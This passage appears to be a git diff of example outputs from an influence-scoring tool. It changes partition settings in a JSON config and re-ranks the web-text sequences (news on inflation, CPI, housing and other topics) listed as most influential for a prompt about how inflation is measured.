“super important.” He noted that Sandberg may have raised fewer eyebrows than a man would have in choosing to discuss the role of a romantic partner in a businesswoman’s career. “The people I’ve observed who are happy, successful [and] fulfilled, oftentimes … [have someone] outside of work who, when good stuff happens, the good stuff is a lot better, and when bad stuff happens, you’ve got someone there who can help you deal with it,” he stated. “And there will be both. Of all the stuff in Lean In, I actually think +The recent downgrading of several Muslim schools suggests a growing nervousness about Islam in the UK, and what they are teaching or allowing on their premises. + +Other faith schools have been inspected, with some found not to be teaching enough about other faiths and cultures. + +The inspections also suggest wider social concerns about the make-up and cohesiveness of British society after years of immigration, and over whether faith schools, in particular, prepare pupils to play their part as full UK citizens. + +The debate over "British values" came to the fore in the wake of the "Trojan horse" affairs, and the realization that hundreds of British Muslim men - and some women - diff --git a/examples/openwebtext/files/factor_arguments.json b/examples/openwebtext/files/scores_raw/factor_arguments.json similarity index 90% rename from examples/openwebtext/files/factor_arguments.json rename to examples/openwebtext/files/scores_raw/factor_arguments.json index f4877ac..75f4a1f 100644 --- a/examples/openwebtext/files/factor_arguments.json +++ b/examples/openwebtext/files/scores_raw/factor_arguments.json @@ -5,13 +5,13 @@ "amp_scale": 65536.0, "has_shared_parameters": false, "covariance_max_examples": 100000, - "covariance_data_partitions": 1, + "covariance_data_partitions": 4, "covariance_module_partitions": 2, "activation_covariance_dtype": "torch.bfloat16", "gradient_covariance_dtype": "torch.bfloat16", "eigendecomposition_dtype": "torch.float64", "lambda_max_examples": 100000, - "lambda_data_partitions": 1, + "lambda_data_partitions": 4, "lambda_module_partitions": 4, "use_iterative_lambda_aggregation": true, "offload_activations_to_cpu": true, diff --git a/examples/openwebtext/files/inflation.txt b/examples/openwebtext/files/scores_raw/inflation.txt similarity index 87% rename from examples/openwebtext/files/inflation.txt rename to examples/openwebtext/files/scores_raw/inflation.txt index 89efa92..70e7afe 100644 --- a/examples/openwebtext/files/inflation.txt +++ b/examples/openwebtext/files/scores_raw/inflation.txt @@ -1,9 +1,9 @@ Query Sequence: -Prompt: Inflation is typically measured by; Completion: the Consumer Price Index (CPI). +Prompt:Inflation is typically measured by; Completion: the Consumer Price Index (CPI). Top Influential Sequences: ================================================================================ -Rank = 0; Score = 3899392.0 +Rank = 0; Score = 2424832.0 <|begin_of_text|>WASHINGTON (Reuters) - Both President Barack Obama and Republicans in the U.S. House of Representatives have made opening offers in negotiations to resolve the “fiscal cliff. Here is a look at the two proposals, which are aimed at averting a more drastic combination of tax increases and spending cuts that economists say could cause a recession: @@ -40,24 +40,7 @@ Obama’s negotiators also sought the ability to raise the nation’s borrowing The administration’s proposal would delay across-the-board spending cuts for a year. In exchange the administration agreed to make $600 billion in spending cuts to entitlement programs.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> ================================================================================ -Rank = 1; Score = 3309568.0 -<|begin_of_text|>India's inflation rate has slumped to the lowest level of modern times and there is much talk that the Reserve Bank of India will lower interest rates to stimulate the economy--that might take a little longer than many are predicting. We must always distinguish between general inflation, a general upward pressure on the price level, and specific price changes. This current low inflation rate looks much more like the effect of the latter, thus interest rate changes aren't so warranted. - -Growth in industrial production fell to a three-month low in May while consumer price index (CPI)-based inflation declined below a stipulated floor of 2 per cent in June, providing the Reserve Bank of India leeway to cut the policy interest rate in August. - -The RBI certainly has the power and the room to cut rates, yes, but that's not quite the correct policy decision here. Which is whether the RBI should cut interest rates as a result of the low inflation and that's much less certain: - -Data released by the Central Statistics Office (CSO) on Wednesday showed retail inflation, as measured by the consumer price index (CPI), rose an annual 1.5% in June, slower than previous month's 2.2%. This was the slowest pace of increase since the government unveiled the new retail inflation series in 2012. The previous lows were in 1999 and in 1978 under a different series. - -My point being that CPI isn't really the correct inflation measure to be using when considering interest rate changes and inflation. The US Federal Reserve, for example, uses the PCE rate although that's not really the important point here. CPI, PCE, RPI, they all have their slight differences and are useful in slightly different manners. But there's a much more important difference we need to take account of: - -Aside from the steep fall in food inflation, which has been downplayed by the RBI time and again, the steady and consistent fall in core inflation (non-food and fuel) could find favour with the central bank. - -It's this difference between core and non-core inflation that matters. It does depend upon which government and which statistical system we're talking about as to whether all produce core and non-core PCE and RPI and CPI, but in general the distinction is understood between the two different types of inflation rate: - -Data on Wednesday showed headline consumer price inflation fell to 1.5 percent in the year to June from an annual 2.2 percent a month ago and below forecasts for a 1.6 percent reading -================================================================================ -Rank = 2; Score = 3244032.0 +Rank = 1; Score = 2080768.0 <|begin_of_text|>Inflation accounting comprises a range of accounting models designed to correct problems arising from historical cost accounting in the presence of high inflation and hyperinflation.[1] [2] For example, in countries experiencing hyperinflation the International Accounting Standards Board requires corporations to implement financial capital maintenance in units of constant purchasing power in terms of the monthly published Consumer Price Index. This does not result in capital maintenance in units of constant purchasing power since that can only be achieved in terms of a daily index. Historical cost basis in financial statements [ edit ] @@ -74,7 +57,24 @@ Misleading reporting under historical cost accounting [ edit ] "In most countries, primary financial statements are prepared on the historical cost basis of accounting without regard either to changes in the general level of prices or to increases in specific prices of assets held, except to the extent that property, plant ================================================================================ -Rank = 3; Score = 3096576.0 +Rank = 2; Score = 1875968.0 +<|begin_of_text|>India's inflation rate has slumped to the lowest level of modern times and there is much talk that the Reserve Bank of India will lower interest rates to stimulate the economy--that might take a little longer than many are predicting. We must always distinguish between general inflation, a general upward pressure on the price level, and specific price changes. This current low inflation rate looks much more like the effect of the latter, thus interest rate changes aren't so warranted. + +Growth in industrial production fell to a three-month low in May while consumer price index (CPI)-based inflation declined below a stipulated floor of 2 per cent in June, providing the Reserve Bank of India leeway to cut the policy interest rate in August. + +The RBI certainly has the power and the room to cut rates, yes, but that's not quite the correct policy decision here. Which is whether the RBI should cut interest rates as a result of the low inflation and that's much less certain: + +Data released by the Central Statistics Office (CSO) on Wednesday showed retail inflation, as measured by the consumer price index (CPI), rose an annual 1.5% in June, slower than previous month's 2.2%. This was the slowest pace of increase since the government unveiled the new retail inflation series in 2012. The previous lows were in 1999 and in 1978 under a different series. + +My point being that CPI isn't really the correct inflation measure to be using when considering interest rate changes and inflation. The US Federal Reserve, for example, uses the PCE rate although that's not really the important point here. CPI, PCE, RPI, they all have their slight differences and are useful in slightly different manners. But there's a much more important difference we need to take account of: + +Aside from the steep fall in food inflation, which has been downplayed by the RBI time and again, the steady and consistent fall in core inflation (non-food and fuel) could find favour with the central bank. + +It's this difference between core and non-core inflation that matters. It does depend upon which government and which statistical system we're talking about as to whether all produce core and non-core PCE and RPI and CPI, but in general the distinction is understood between the two different types of inflation rate: + +Data on Wednesday showed headline consumer price inflation fell to 1.5 percent in the year to June from an annual 2.2 percent a month ago and below forecasts for a 1.6 percent reading +================================================================================ +Rank = 3; Score = 1687552.0 <|begin_of_text|>A Wall St. sign is seen outside the entrance of NYSE Thomson Reuters By Tanya Agrawal (Reuters) - U.S. stock index futures fell on Wednesday as Chinese stocks had another roller coaster ride and as investors await the minutes from last month's Federal Reserve meeting for clues on when interest rates will be increased. @@ -105,18 +105,7 @@ Futures snapshot at 7:07 a.m. ET: * Dow e-minis <1YMc1> were down 57 points, ================================================================================ -Rank = 4; Score = 2899968.0 -<|begin_of_text|>Cryptography’s most familiar application is perhaps the sending of coded messages: Alice wants to communicate some information to her distant confidante Bob. She worries that her message might be intercepted by an eavesdropper, so she encrypts it in a way that only Bob can decipher. But there exists a whole range of complementary cryptographic tasks—such as online auctions and secure voting—in which Alice and Bob want to guard against attacks not from eavesdroppers but from each other. - -To develop algorithms to perform those other tasks, cryptographers use a building block called bit commitment: Alice chooses a bit (a 1 or 0) to be revealed later; Bob wants to ensure that Alice can’t change her mind in the meantime, while Alice wants to ensure that Bob has no way to learn which bit she chose until the appointed time. - -Although quantum theory is the basis for perfectly secure encryption, it offers no path to secure bit commitment. But a different law of physics, the impossibility of faster-than-light signaling, has now come to the rescue, and Anthony Martin, Hugo Zbinden, and their colleagues at the University of Geneva have implemented a protocol for achieving bit commitment for a full 24 hours. - -For the protocol to work, Alice and Bob work with trusted partners Amy and Brian, respectively. Bob and Brian take turns exchanging data with Alice and Amy, in such a way that each exchange falls outside the forward light cone of the previous one. Each of Alice’s and Amy’s answers depends on both the data they receive from Bob or Brian and on information Alice and Amy agree on in advance, including the bit they want to commit. For Alice to cheat and change the bit at any time in the middle of the protocol, she’d need to know what happened in Amy’s most recent exchange with Brian; relativity prevents her from having that information. - -In their 24-hour implementation, Martin and colleagues repeated the exchanges for 5 billion rounds, one every 17 µs, with a total of 162 GB of data. According to two theory papers from the past year, the probability that the protocol is vulnerable to cheating is less than one in a billion. (E. Verbanis et al., Phys. Rev. Lett. 117, 140506, 2016.)<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> -================================================================================ -Rank = 5; Score = 2637824.0 +Rank = 4; Score = 1622016.0 <|begin_of_text|>Intelligence, cognitive ability or cognitive performance is usually measured by a battery of tests that aim to quantify skills such as memory and analytical ability. There is loads of variation between people in how they perform on such tests, and these differences can be due to genetic and environment factors, and their interplay. In research published in the Proceedings of the National Academy of Science (PNAS) today, we show three genetic variants in humans that can account for a couple of IQ points – but before you get excited, these are only three variants out of likely thousands. @@ -143,7 +132,43 @@ We tested 69 genetic variants from the educational attainment study (of almost 1 The essence of this design was to piggy-back on a much larger study from a correlated trait (educational attainment) to pre-select a small number of genetic variants. These were then tested for association with cognitive performance – ================================================================================ -Rank = 6; Score = 2506752.0 +Rank = 5; Score = 1490944.0 +<|begin_of_text|>This article is about the medical term. For the stock market term, see overweight (stock market) + +Overweight The overweight range according to the body mass index (BMI) is the area on the chart where BMI > 25 Specialty Endocrinology + +Being overweight or fat is having more body fat than is optimally healthy. Being overweight is especially common where food supplies are plentiful and lifestyles are sedentary. + +As of 2003, excess weight reached epidemic proportions globally, with more than 1 billion adults being either overweight or obese.[1] In 2013 this increased to more than 2 billion.[2] Increases have been observed across all age groups. + +A healthy body requires a minimum amount of fat for proper functioning of the hormonal, reproductive, and immune systems, as thermal insulation, as shock absorption for sensitive areas, and as energy for future use. But the accumulation of too much storage fat can impair movement, flexibility, and alter the appearance of the body. + +Classification + +The degree to which a person is overweight is generally described by the body mass index (BMI). Overweight is defined as a BMI of 25 or more, thus it includes pre-obesity defined as a BMI between 25 and 30 and obesity as defined by a BMI of 30 or more.[3][4] Pre-obese and overweight however are often used interchangeably, thus giving overweight a common definition of a BMI of between 25–30. There are, however, several other common ways to measure the amount of adiposity or fat present in an individual's body. + +Body mass index + +The body mass index (BMI) is a measure of a person's weight taking into account their height. It is given by the following formula: BMI equals a person's weight (mass) in kilograms divided by the square of the person's height in metres. The units therefore are kg/m2 but BMI measures are typically used and written without units. + +BMI provides a significantly more accurate representation of body fat content than simply measuring a person's weight. It is only moderately correlated with both body fat percentage and body fat mass (R2 of 0.68).[5] It does not take into account certain factors such as pregnancy or bodybuilding; however, the BMI is an accurate reflection of fat percentage in the majority of the adult population. + +The body volume index (BVI) was devised in 2000 as a computer, rather than manual, measurement of the human body for obesity and an alternative to the BMI + +BVI uses 3D software +================================================================================ +Rank = 6; Score = 1409024.0 +<|begin_of_text|>Cryptography’s most familiar application is perhaps the sending of coded messages: Alice wants to communicate some information to her distant confidante Bob. She worries that her message might be intercepted by an eavesdropper, so she encrypts it in a way that only Bob can decipher. But there exists a whole range of complementary cryptographic tasks—such as online auctions and secure voting—in which Alice and Bob want to guard against attacks not from eavesdroppers but from each other. + +To develop algorithms to perform those other tasks, cryptographers use a building block called bit commitment: Alice chooses a bit (a 1 or 0) to be revealed later; Bob wants to ensure that Alice can’t change her mind in the meantime, while Alice wants to ensure that Bob has no way to learn which bit she chose until the appointed time. + +Although quantum theory is the basis for perfectly secure encryption, it offers no path to secure bit commitment. But a different law of physics, the impossibility of faster-than-light signaling, has now come to the rescue, and Anthony Martin, Hugo Zbinden, and their colleagues at the University of Geneva have implemented a protocol for achieving bit commitment for a full 24 hours. + +For the protocol to work, Alice and Bob work with trusted partners Amy and Brian, respectively. Bob and Brian take turns exchanging data with Alice and Amy, in such a way that each exchange falls outside the forward light cone of the previous one. Each of Alice’s and Amy’s answers depends on both the data they receive from Bob or Brian and on information Alice and Amy agree on in advance, including the bit they want to commit. For Alice to cheat and change the bit at any time in the middle of the protocol, she’d need to know what happened in Amy’s most recent exchange with Brian; relativity prevents her from having that information. + +In their 24-hour implementation, Martin and colleagues repeated the exchanges for 5 billion rounds, one every 17 µs, with a total of 162 GB of data. According to two theory papers from the past year, the probability that the protocol is vulnerable to cheating is less than one in a billion. (E. Verbanis et al., Phys. Rev. Lett. 117, 140506, 2016.)<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 7; Score = 1368064.0 <|begin_of_text|>Colleges need to adapt so that university education doesn't become too expensive for all. University life. (Photo: M. Spencer Green, AP) Story Highlights Administrative bloat at American colleges and universities is out of hand. @@ -162,7 +187,7 @@ That has led many students (and sometimes their co-signing parents) into a night Some commentators blame lazy, overpaid faculty. But while faculty teaching loads are somewhat lower than they were decades ago, faculty-student ratios have been quite stable over the past several decades, while the ratio of administrators and staff to students has become much less favorable. In his book on administrative bloat, The Fall Of The Faculty, Johns Hopkins professor Benjamin Ginsberg reports that although student-faculty ratios fell slightly between 1975 and 2005, from 16-to-1 to 15-to-1, the student-to-administrator ratio fell from 84-to-1 to 68-to-1, and the student-to-professional-staff ratio fell from 50-to-1 to 21-to-1. Gins ================================================================================ -Rank = 7; Score = 2342912.0 +Rank = 8; Score = 1343488.0 <|begin_of_text|>Students carry signs to protest Act 10 in February of 2011 near D.C. Everest High School in Weston. Daily Herald Media file photo Chad Dally/Wausau Daily HeraldD.C. Everest High School students, from left, Candace Perria, Nick Marvin, Emily Wurzer and Ashley Rawlings carry signs to protest Gov. Scott Walker's move to alter Wisconsin's union rights. The action at D.C. Everest was part of a mass protest at school districts throughout the area, including Merrill, Wausau and Mosinee. (Photo: File) The Fond du Lac County Finance Committee is considering a proposal that would provide a workaround of the restrictions of the controversial collective bargaining law Act 10 for members of a public employees union. @@ -183,7 +208,26 @@ Next year's supplemental pay would have to be reapproved by the board, and every "This is just the least problematic way of getting the increase to the employees without creating extra coding in our system," County Executive Al Buechel said. "When you look at personnel administration ================================================================================ -Rank = 8; Score = 2277376.0 +Rank = 9; Score = 1335296.0 +<|begin_of_text|>Experts have roundly criticized BC Premier Christy Clark’s recent home ownership grant policy. A key part of the negative reaction has been based on fears that interest free grants will increase housing prices and drive a further wedge between incomes and housing costs, a divide already plaguing the Vancouver and lower mainland markets. + +These worries about the divide between housing prices and incomes are well founded. + +Trends in residential property prices and housing affordability between 2005 and 2016 paint a grim picture in both Vancouver and the city of Toronto. This article looks at those trends, analyzing the mortgage cost of homes in these two cities and in comparison to Canada more broadly. + +More specifically, it looks at the number of weeks of labour time it would take workers making the average weekly wage to make a mortgage purchase in each city. The data are startling. + +Methodology: + +The nominal dollar cost of a house or a condo today is much higher than it was 10 or 20 years ago. Indeed, it is even higher than what it was just a couple of years ago. There exists a number of indices that look at the price of housing by deflating the nominal dollar price of a house by the consumer price index (CPI) to get an idea of how fast housing prices are rising relative to the general rise in prices of consumer goods. + +This article does something different. It calculates how many weeks of labour time, paid at average provincial weekly rates, it takes to purchase an average residential property. In order to do so, it makes some key assumptions. + +The calculations in this article concern changes in the mortgage costs of residential property purchases. Here, I assume that the entire price of the properties (inclusive of mortgage fees and financing costs) were paid through a mortgage financed with 5-year mortgage loans amortized over 15 years. In other words, it assumes no initial down payment. By looking at the weeks of labour time, the analysis assumes that all of a person’s income is going towards financing their mortgage. Of course, we know people have many other fixed costs and financial responsibilities. But this measure gives us an informative picture of the glaring gap between incomes and housing prices. + +Of course, since we don’t know what interest rates and wage rates will be after 2016, the numbers for the years after 2011 are estimates based on an extrapolation of recent data for these two variables. The calculation also assume, after 2011, a return towards trend values in the case of interest rates). Finally, the data is based on yearly averages. So +================================================================================ +Rank = 10; Score = 1310720.0 <|begin_of_text|>Introduction A carbon footprint is the measure of the amount of greenhouse gases (Carbon footprint), measured in units of carbon dioxide, produced by human activities. A carbon footprint can be measured for an individual or an organization, and is typically given in tons of CO 2 -equivalent (CO 2 -eq) per year. For example, the average North American generates about 20 tons of CO 2 -eq each year. The global average carbon footprint is about 4 tons of CO 2 -eq per year (Figure 1). Introduction A carbon footprint is the measure of the amount of greenhouse gases (Carbon footprint), measured in units of carbon dioxide, produced by human activities. A carbon footprint can be measured for an individual or an organization, and is typically given in tons of CO 2 -equivalent (CO 2 -eq) per year. For example, the average North American generates about 20 tons of CO 2 -eq each year. The global average carbon footprint is about 4 tons of CO 2 -eq per year (Figure 1). @@ -200,7 +244,7 @@ Figure 2. Anthropogenic greenhouse gas emissions. (Source: Energy Information Ad Although carbon footprints are reported in annual tons of CO 2 emissions, they actually are a measure of total greenhouse gas emissions. A greenhouse gas is any gas that traps heat in the atmosphere through the greenhouse effect. Because of the presence of greenhouse gases in our atmosphere the average temperature of the Earth ================================================================================ -Rank = 9; Score = 2195456.0 +Rank = 11; Score = 1277952.0 <|begin_of_text|>A teen invites “Destiny” to the prom using the face of a cliff in Black Cliffs east of Boise. (Patrick Orr/Ada County Sheriff’s Office via AP) Jay L Zagorsky is an economist at Ohio State University. @@ -223,70 +267,47 @@ The typical 17-year-old going to the prom this year was born in 1998. Since then The Prom Price Index ================================================================================ -Rank = 10; Score = 2195456.0 -<|begin_of_text|>This article is about the medical term. For the stock market term, see overweight (stock market) - -Overweight The overweight range according to the body mass index (BMI) is the area on the chart where BMI > 25 Specialty Endocrinology - -Being overweight or fat is having more body fat than is optimally healthy. Being overweight is especially common where food supplies are plentiful and lifestyles are sedentary. - -As of 2003, excess weight reached epidemic proportions globally, with more than 1 billion adults being either overweight or obese.[1] In 2013 this increased to more than 2 billion.[2] Increases have been observed across all age groups. +Rank = 12; Score = 1245184.0 +<|begin_of_text|>Russia's Consumer Price Index (CPI) in October fell again to an extraordinary low of 2.7% year-on-year down from the already low 3% seen in September, Rosstat statistics agency said on November 7. -A healthy body requires a minimum amount of fat for proper functioning of the hormonal, reproductive, and immune systems, as thermal insulation, as shock absorption for sensitive areas, and as energy for future use. But the accumulation of too much storage fat can impair movement, flexibility, and alter the appearance of the body. +Inflation has strongly overshooting the Central Bank of Russia (CBR) target of 4% set for 2017, diving from double-digit price growth in less than two years. -Classification +However, the CBR keeps pointing to stubborn inflationary expectations and other medium-terms inflationary risks and sticks to the moderately tight monetary policy despite the pressure from the government to support growth with lower interest. The current rate is by far the lowest in post-Soviet history but the population remain stubbornly convinced that the fall is temporary, according to the CBR surveys. The result is inflationary pressure remains lurking and the CBR is reluctant to accelerate rate cuts until the population expectations of price rises relent. -The degree to which a person is overweight is generally described by the body mass index (BMI). Overweight is defined as a BMI of 25 or more, thus it includes pre-obesity defined as a BMI between 25 and 30 and obesity as defined by a BMI of 30 or more.[3][4] Pre-obese and overweight however are often used interchangeably, thus giving overweight a common definition of a BMI of between 25–30. There are, however, several other common ways to measure the amount of adiposity or fat present in an individual's body. +The CBR decided to cut the key interest rate by 25bp at the board of directors meeting on October 27, in line with the expectations. -Body mass index +A more aggressive cut of 50bp would have meant that the CBR could prepare to tighten the policy again in the beginning of 2018, some analysts suggested. However, the CBR decided to abstain from an aggressive move and cut the rate by the minimum step of 25bp to 8.25%. -The body mass index (BMI) is a measure of a person's weight taking into account their height. It is given by the following formula: BMI equals a person's weight (mass) in kilograms divided by the square of the person's height in metres. The units therefore are kg/m2 but BMI measures are typically used and written without units. +Last week Alfa Bank argued that "at the moment we do not agree with the government’s concerns that low inflation is the result of the tight monetary policy of the CBR." -BMI provides a significantly more accurate representation of body fat content than simply measuring a person's weight. It is only moderately correlated with both body fat percentage and body fat mass (R2 of 0.68).[5] It does not take into account certain factors such as pregnancy or bodybuilding; however, the BMI is an accurate reflection of fat percentage in the majority of the adult population. +The analysts that forecasted inflation easing to 2.8% in October maintained that "medium-term inflationary risks are considerable and that the CBR should thus not accelerate interest rate cuts." -The body volume index (BVI) was devised in 2000 as a computer, rather than manual, measurement of the human body for obesity and an alternative to the BMI +However, VTB Capital previously argued that "the incoming data for October and November might nudge the Board to opt for a more ambitious cut of 50bp," while noting that "this would call for surprises from inflation reports, banking stats and economic activity data to combine into a convincing case." -BVI uses 3D software +The CBR expects inflation to end 2017 at 3.5-3.8%, while the Ministry of Economic Development that needs lower interest rates to help its ambitious 2.1% growth outlook expects 2.7-3.2% inflation in 2017.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> ================================================================================ -Rank = 11; Score = 2113536.0 -<|begin_of_text|>Experts have roundly criticized BC Premier Christy Clark’s recent home ownership grant policy. A key part of the negative reaction has been based on fears that interest free grants will increase housing prices and drive a further wedge between incomes and housing costs, a divide already plaguing the Vancouver and lower mainland markets. - -These worries about the divide between housing prices and incomes are well founded. - -Trends in residential property prices and housing affordability between 2005 and 2016 paint a grim picture in both Vancouver and the city of Toronto. This article looks at those trends, analyzing the mortgage cost of homes in these two cities and in comparison to Canada more broadly. - -More specifically, it looks at the number of weeks of labour time it would take workers making the average weekly wage to make a mortgage purchase in each city. The data are startling. - -Methodology: - -The nominal dollar cost of a house or a condo today is much higher than it was 10 or 20 years ago. Indeed, it is even higher than what it was just a couple of years ago. There exists a number of indices that look at the price of housing by deflating the nominal dollar price of a house by the consumer price index (CPI) to get an idea of how fast housing prices are rising relative to the general rise in prices of consumer goods. - -This article does something different. It calculates how many weeks of labour time, paid at average provincial weekly rates, it takes to purchase an average residential property. In order to do so, it makes some key assumptions. - -The calculations in this article concern changes in the mortgage costs of residential property purchases. Here, I assume that the entire price of the properties (inclusive of mortgage fees and financing costs) were paid through a mortgage financed with 5-year mortgage loans amortized over 15 years. In other words, it assumes no initial down payment. By looking at the weeks of labour time, the analysis assumes that all of a person’s income is going towards financing their mortgage. Of course, we know people have many other fixed costs and financial responsibilities. But this measure gives us an informative picture of the glaring gap between incomes and housing prices. +Rank = 13; Score = 1064960.0 +<|begin_of_text|>We tend to think of inflation as a singular force that affects everyone the same way. It turns out however that the poorest households may have m'ore to lose as the peso shrinks. In this photo is a 100 trillion Zimbabwe dollar bill, commonplace during its period of hyperinflation. (Photo: Paul/Flickr, CC BY 2.0) -Of course, since we don’t know what interest rates and wage rates will be after 2016, the numbers for the years after 2011 are estimates based on an extrapolation of recent data for these two variables. The calculation also assume, after 2011, a return towards trend values in the case of interest rates). Finally, the data is based on yearly averages. So -================================================================================ -Rank = 12; Score = 1941504.0 -<|begin_of_text|>Russia's Consumer Price Index (CPI) in October fell again to an extraordinary low of 2.7% year-on-year down from the already low 3% seen in September, Rosstat statistics agency said on November 7. +This content is also available on Medium -Inflation has strongly overshooting the Central Bank of Russia (CBR) target of 4% set for 2017, diving from double-digit price growth in less than two years. +Everyone knows about inflation - a pervasive, unstoppable force that moves prices (and hopefully wages) upward in the economy, but do we really understand it? Further analysis reveals that official overall inflation statistics understate the effect of rising prices on the poor. -However, the CBR keeps pointing to stubborn inflationary expectations and other medium-terms inflationary risks and sticks to the moderately tight monetary policy despite the pressure from the government to support growth with lower interest. The current rate is by far the lowest in post-Soviet history but the population remain stubbornly convinced that the fall is temporary, according to the CBR surveys. The result is inflationary pressure remains lurking and the CBR is reluctant to accelerate rate cuts until the population expectations of price rises relent. +Understanding Inflation -The CBR decided to cut the key interest rate by 25bp at the board of directors meeting on October 27, in line with the expectations. +Inflation is measured through changes in what is called the Consumer Price Index or CPI. This is an aggregate measure of prices based on a certain ‘basket’ of goods composed of those typically consumed by households. It seems like a fair enough way to measure general price increases, but it has the effect of making you think that inflation affects everyone equally - it does not. -A more aggressive cut of 50bp would have meant that the CBR could prepare to tighten the policy again in the beginning of 2018, some analysts suggested. However, the CBR decided to abstain from an aggressive move and cut the rate by the minimum step of 25bp to 8.25%. +The basket of goods is an approximation of the average proportions that households consume. It turns out, however, that there are significant differences in the basket of goods for households from different income levels: -Last week Alfa Bank argued that "at the moment we do not agree with the government’s concerns that low inflation is the result of the tight monetary policy of the CBR." +Lower income classes tend to spend more of their income on Food & Beverage, and this proportion drops as we move up the income scale. This is because the absolute level of food consumed in the household is limited, and extra income is allocated to certain ‘luxuries’ and other necessities, evidenced by the fact that higher income households spend more of their income on the other, non-food categories. -The analysts that forecasted inflation easing to 2.8% in October maintained that "medium-term inflationary risks are considerable and that the CBR should thus not accelerate interest rate cuts." +Just as a validity check: the data that we generated from the FIES raw data closely approximates the official NSO weighting, except for food and housing. I suspect that imputed rental value was used by the NSO instead of actual rentals paid, but since there was no breakdown in the CPI Technical Notes, I can’t say for sure. Nevertheless, it is the variance in the effect, not the absolute effect, that we are interested in. -However, VTB Capital previously argued that "the incoming data for October and November might nudge the Board to opt for a more ambitious cut of 50bp," while noting that "this would call for surprises from inflation reports, banking stats and economic activity data to combine into a convincing case." +So what does this mean? Different income classes will experience different inflation burdens because the prices of goods and services that they consume rise at different rates: -The CBR expects inflation to end 2017 at 3.5-3.8%, while the Ministry of Economic Development that needs lower interest rates to help its ambitious 2.1% growth outlook expects 2.7-3.2% inflation in 2017.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +Since the base year 2006, essentials such as food and beverage and education have risen much more than the overall inflation rate. This means that poorer households that spend more of their income on food and beverage will feel a stronger pinch from price increases. Non-essential goods’ prices have risen slower than inflation except for Alcohol & Tobacco which were ================================================================================ -Rank = 13; Score = 1703936.0 +Rank = 14; Score = 1056768.0 <|begin_of_text|>New Delhi: Showing signs of recovery, industrial output rose to nearly 3-year high of 6.4 percent in August on improvement in manufacturing and capital goods while retail inflation remained with in comfort zone. The manufacturing sector, which constitutes over 75 percent of the index, grew by 6.9 percent in August, while the capital goods output rose by 21.8 percent in the month indicating a recovery. @@ -315,7 +336,7 @@ said, "..Pleased to see finally the green shoots of economic activity getting co "On the whole, these estimates put forward certain ================================================================================ -Rank = 14; Score = 1581056.0 +Rank = 15; Score = 921600.0 <|begin_of_text|>The Bank of Canada will publish the results of its recent review of interest rates on Wednesday, and there is plenty of speculation Governor Stephen Poloz will use the opportunity to raise the bank’s overnight rate, which would increase costs for everything from mortgages to business loans. The speculation is largely based on strong GDP performance for the first quarter of 2017, though one good quarter does not a year make. 